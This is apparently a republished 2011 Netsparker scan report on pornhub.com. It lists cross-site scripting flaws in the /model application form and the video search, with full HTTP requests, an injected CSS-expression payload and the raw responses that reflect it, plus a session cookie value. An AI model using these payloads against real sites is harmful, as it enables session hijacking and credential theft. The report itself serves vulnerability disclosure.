www.pornhub.com, XSS, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Private Reporting of Security Research is preferred for Online Service Providers



Netsparker - Scan Report Summary
TARGET URL: http://www.pornhub.com/
SCAN DATE: 6/2/2011 5:08:28 AM
REPORT DATE: 6/2/2011 8:56:57 AM
SCAN DURATION: 00:22:17
Total Requests: 13276
Average Speed: 9.93 req/sec.
Identified: 14
Confirmed: 10
Critical: 0
Informational: 2

SCAN SETTINGS

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

IMPORTANT: 57 %
MEDIUM: 7 %
LOW: 21 %
INFORMATION: 14 %

VULNERABILITY SUMMARY

| URL | Parameter | Method | Vulnerability | Confirmed |
|---|---|---|---|---|
| /crossdomain.xml | | | Open Policy Crossdomain.xml Identified | Yes |
| /front/flash10bug | | | [Possible] Internal IP Address Leakage | No |
| /information | | | E-mail Address Disclosure | No |
| /model | model_city | POST | Cross-site Scripting | Yes |
| | model_email | POST | Cross-site Scripting | Yes |
| | model_firstname | POST | Cross-site Scripting | Yes |
| | model_lastname | POST | Cross-site Scripting | Yes |
| | model_phone | POST | Cross-site Scripting | Yes |
| /robots.txt | | | Robots.txt Identified | Yes |
| /user/search | o | GET | Internal Server Error | Yes |
| /video/search | c | GET | Cross-site Scripting | Yes |
| | search | GET | Cross-site Scripting | No |
| | search | GET | Cross-site Scripting | No |
| /view_video.php | | | Cookie Not Marked As HttpOnly | Yes |
Cross-site Scripting

8 TOTAL, IMPORTANT, 6 CONFIRMED
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the user's current session or changing the look of the page by rewriting the HTML on the fly to steal the user's credentials. This happens because input entered by a user is interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, it allows attackers to hijack other users' sessions, so an attacker might target an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; good examples include the OWASP Reform and Microsoft Anti Cross-site Scripting libraries.

Remedy References

External References

- /model

/model CONFIRMED

http://www.pornhub.com/model

Parameters

Parameter Type Value
available_1 POST 1
available_2 POST 1
available_3 POST 1
available_4 POST 1
available_5 POST 1
available_6 POST 1
model_city POST " stYle="x:expre/**/ssion(alert(9))
model_email POST netsparker@example.com
model_firstname POST Smith
model_gender POST female
model_lastname POST Smith
model_moreinfo POST 3
model_phone POST 3
pic1 POST 3
pic2 POST 3
pic3 POST 3
pic4 POST 3

Request

POST /model HTTP/1.1
Referer: http://www.pornhub.com/model
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=fa6945c38bb84934b144c6d7dfb91e7c
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Content-Length: 1675
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_1"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_2"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_3"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_4"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_5"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_6"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_city"

" stYle="x:expre/**/ssion(netsparker(9))
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_email"

netsparker@example.com
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_firstname"

Smith
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_gender"

female
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_lastname"

Smith
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_moreinfo"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_phone"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="pic1"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="pic2"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="pic3"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="pic4"

3
--fa6945c38bb84934b144c6d7dfb91e7c--

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:13:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4936
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Become a Pornstar Model</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 
'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" 
style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/model" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 
'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/model" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> 
<li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div id="model_container">
<p id="model_title">Pornhub Advertising</p>
<p id="model_description">
If your an aspiring young female model and have ever thought of starting a career in the adult industry, well look no further!
Here's the first step you need to take in order to make your dream become a reality. Fill out the form below and you will be contacted by us if you have what it takes.
</p>
<p id="model_error">Your submition contains some errors. Please correct them and try again.</p> <form id="model_form" method="post" enctype="multipart/form-data">
<ul id="model_application">
<li>Must be 18 years of age or older</li>
<li>Willing to travel</li>
<li>We require nude pictures (front, back, face)</li>
<li>We pay all travel expenses, lodging and food</li>
<li>Must be open to participate in adult oriented content</li>
</ul>
<div id="model_information">
<label for="model_firstname">First name:</label><input type="text" id="model_firstname" name="model_firstname" value="Smith"><br />
<label for="model_lastname">Last name:</label><input type="text" id="model_lastname" name="model_lastname" value="Smith"><br />
<label for="model_phone">Phone number:</label><input type="text" id="model_phone" name="model_phone" value="3"><br />
<label for="model_phone">City, Country:</label><input type="text" id="model_city" name="model_city" value="" stYle="x:expre/**/ssion(netsparker(9)) "><br />
<label for="model_email">E-mail:</label><input type="text" id="model_email" name="model_email" value="netsparker@example.com"><br />
<label for="model_gender">Gender:</label><select id="model_gender" name="model_gender"><option selected="selected" value="female">Female</option></select>
</div>
<textarea id="model_moreinfo" name="model_moreinfo">3</textarea>
<div id="model_available">
<input type="checkbox" id="available_1" name="available_1" value="1" checked="checked"><label for="available_1">Anal</label><br />
<input type="checkbox" id="available_2" name="available_2" value="1" checked="checked"><label for="available_2">Boy / Girl</label><br />
<input type="checkbox" id="available_3" name="available_3" value="1" checked="checked"><label for="available_3">Girl / Girl</label><br />
<input type="checkbox" id="available_4" name="available_4" value="1" checked="checked"><label for="available_4">Boy / Boy / Girl</label><br />
<input type="checkbox" id="available_5" name="available_5" value="1" checked="checked"><label for="available_5">Boy / Girl / Girl</label><br />
<input type="checkbox" id="available_6" name="available_6" value="1" checked="checked"><label for="available_6">DP</label>
</div>
<div id="model_pics" style="border:1px solid red;">
<label for="pic1">Pic #1:</label><input type="file" id="pic1" name="pic1"><br />
<label for="pic2">Pic #2:</label><input type="file" id="pic2" name="pic2"><br />
<label for="pic3">Pic #3:</label><input type="file" id="pic3" name="pic3"><br />
<label for="pic4">Pic #4:</label><input type="file" id="pic4" name="pic4">
</div>
<p id="model_note"><b>Note:</b> Applications submitted by men will be disregarded and you will not receive a response.</p>
<input type="submit" id="model_submit" value="Submit form">
</form>
</div> </div><!--closes section_wrapper--> <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script> <script type="text/javascript"> var bodyHeight = parseInt($j("body").css("height")); var boxThWidth = parseInt($j("#boxThSel").css("width")); var windowWidth, boxFade, marginValue; function fadeObject (elementFade , value) { $j(elementFade).animate({ opacity: value }, 1000 ); } function ignoreCloseThAlert(cookieName) { setCookie(cookieName, 1); fadeOut('#boxThSel' , 0); fadeOut('#bkg-container' , 0); $j("#boxThSel").css("display" , "none"); $j("#bkg-container").css("display" , "none"); } function fadeOut(boxToFade , numberValue) { fadeObject (boxToFade , numberValue); return false; } function positionBox(marginValue) { if($j(window).width() > 965 ){ windowWidth = $j(window).width(); //$j("#boxThSel").css("left", (windowWidth /2 ) - (boxThWidth - marginValue) + "px"); } } $j(document).ready(function (){ $j("#bkg-container").css("height" , bodyHeight + "px"); }); try { var pageTracker = _gat._getTracker("UA-2623535-1"); pageTracker._setDomainName(".pornhub.com"); pageTracker._setAllowHash(false); pageTracker._setSampleRate("10"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); } catch(err) {} </script> <div style="clear:both;"> <p class="footer"> The PornHub team is always updating and adding more porn videos every day. It's all here and 100% free porn. We have a huge free DVD selection that you can download or stream. PornHub is the most complete and revolutionary porn tube site. We offer streaming porn videos, downloadable DVDs, photo albums, and the number 1 free sex community on the net. We&rsquo;re always working towards adding more features that will keep your porno addiction alive and well. Send us feedback if you have any questions/comments. 
</p> <p class="footer"> Pornhub.com, 2011 &middot; <a href="/information#faq" rel="nofollow">FAQ</a> &middot; <a href="/information#terms" rel="nofollow">terms and conditions</a> &middot; <a href="/information#privacy" rel="nofollow">privacy policy</a> &middot; <a href="/information#dmca" rel="nofollow">DMCA</a> &middot; <a href="/information#btn-2257" rel..
- /model

/model CONFIRMED

http://www.pornhub.com/model

Parameters

Parameter Type Value
available_1 POST 1
available_2 POST 1
available_3 POST 1
available_4 POST 1
available_5 POST 1
available_6 POST 1
model_city POST 3
model_email POST " stYle="x:expre/**/ssion(alert(9))
model_firstname POST Smith
model_gender POST female
model_lastname POST Smith
model_moreinfo POST 3
model_phone POST 3
pic1 POST 3
pic2 POST 3
pic3 POST 3
pic4 POST 3

Request

POST /model HTTP/1.1
Referer: http://www.pornhub.com/model
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=a6c1b688aa854d36ab4f19da8629f727
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Content-Length: 1654
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_1"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_2"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_3"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_4"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_5"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_6"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_city"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_email"

" stYle="x:expre/**/ssion(netsparker(9))
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_firstname"

Smith
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_gender"

female
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_lastname"

Smith
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_moreinfo"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_phone"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="pic1"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="pic2"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="pic3"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="pic4"

3
--a6c1b688aa854d36ab4f19da8629f727--

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:13:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4923
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Become a Pornstar Model</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 
'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" 
style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/model" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 
'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/model" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> 
<li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div id="model_container">
<p id="model_title">Pornhub Advertising</p>
<p id="model_description">
If your an aspiring young female model and have ever thought of starting a career in the adult industry, well look no further!
Here's the first step you need to take in order to make your dream become a reality. Fill out the form below and you will be contacted by us if you have what it takes.
</p>
<p id="model_error">Your submition contains some errors. Please correct them and try again.</p> <form id="model_form" method="post" enctype="multipart/form-data">
<ul id="model_application">
<li>Must be 18 years of age or older</li>
<li>Willing to travel</li>
<li>We require nude pictures (front, back, face)</li>
<li>We pay all travel expenses, lodging and food</li>
<li>Must be open to participate in adult oriented content</li>
</ul>
<div id="model_information" style="border:1px solid red;">
<label for="model_firstname">First name:</label><input type="text" id="model_firstname" name="model_firstname" value="Smith"><br />
<label for="model_lastname">Last name:</label><input type="text" id="model_lastname" name="model_lastname" value="Smith"><br />
<label for="model_phone">Phone number:</label><input type="text" id="model_phone" name="model_phone" value="3"><br />
<label for="model_phone">City, Country:</label><input type="text" id="model_city" name="model_city" value="3"><br />
<label for="model_email">E-mail:</label><input type="text" id="model_email" name="model_email" value="" stYle="x:expre/**/ssion(netsparker(9)) "><br />
<label for="model_gender">Gender:</label><select id="model_gender" name="model_gender"><option selected="selected" value="female">Female</option></select>
</div>
<textarea id="model_moreinfo" name="model_moreinfo">3</textarea>
<div id="model_available">
<input type="checkbox" id="available_1" name="available_1" value="1" checked="checked"><label for="available_1">Anal</label><br />
<input type="checkbox" id="available_2" name="available_2" value="1" checked="checked"><label for="available_2">Boy / Girl</label><br />
<input type="checkbox" id="available_3" name="available_3" value="1" checked="checked"><label for="available_3">Girl / Girl</label><br />
<input type="checkbox" id="available_4" name="available_4" value="1" checked="checked"><label for="available_4">Boy / Boy / Girl</label><br />
<input type="checkbox" id="available_5" name="available_5" value="1" checked="checked"><label for="available_5">Boy / Girl / Girl</label><br />
